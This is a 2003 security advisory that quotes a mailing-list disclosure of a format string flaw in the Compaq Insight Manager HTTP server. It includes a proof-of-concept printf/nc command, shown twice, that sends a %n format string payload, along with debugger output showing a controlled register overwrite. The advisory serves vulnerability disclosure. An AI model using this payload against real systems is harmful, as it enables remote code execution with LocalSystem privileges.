Compaq Insight Manager Format String Flaw May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1007390|
SecurityTracker URL: http://securitytracker.com/id/1007390
(Links to External Site)
Date: Aug 4 2003
Execution of arbitrary code via network, Root access via network|
Exploit Included: Yes |
Version(s): 5.00 H|
A vulnerability was reported in HP/Compaq Insight Manager. A remote user may be able to execute arbitrary code.|
It is reported that there is a format string flaw in the processing of DebugSearchPaths HTTP requests. According to the report, the EAX register can be overwritten. It may be possible for a remote user to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].
A demonstration exploit command is provided:
$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
A remote user may be able to execute arbitrary code with LocalSystem privileges [but that was not confirmed in the report].|
No solution was available at the time of this entry.|
Vendor URL: www.hp.com/ (Links to External Site)
Input validation error|
|Underlying OS: Windows (Any)|
Source Message Contents
Subject: [Full-Disclosure] formatstring bug in Compaq HTTP Servers|
There is a formatstring bug in Compaq HTTP Servers.
[in <!.DebugSearchPaths>?Url=> requests]
The HTTP server runs with LocalSystem account.
All versions i have tested had this formatstring bug.
To be shure that it wasn't allready fixed, i downloaded this new version..
Insight Management Agent
Version: 5.00 H (01/17/2003)
$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print
".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
(9a8.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800
eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
780127a8 8908 mov [eax],ecx ds:0023:42424242=????????
*** WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Compaq
Have a nice day
Full-Disclosure - We believe in it.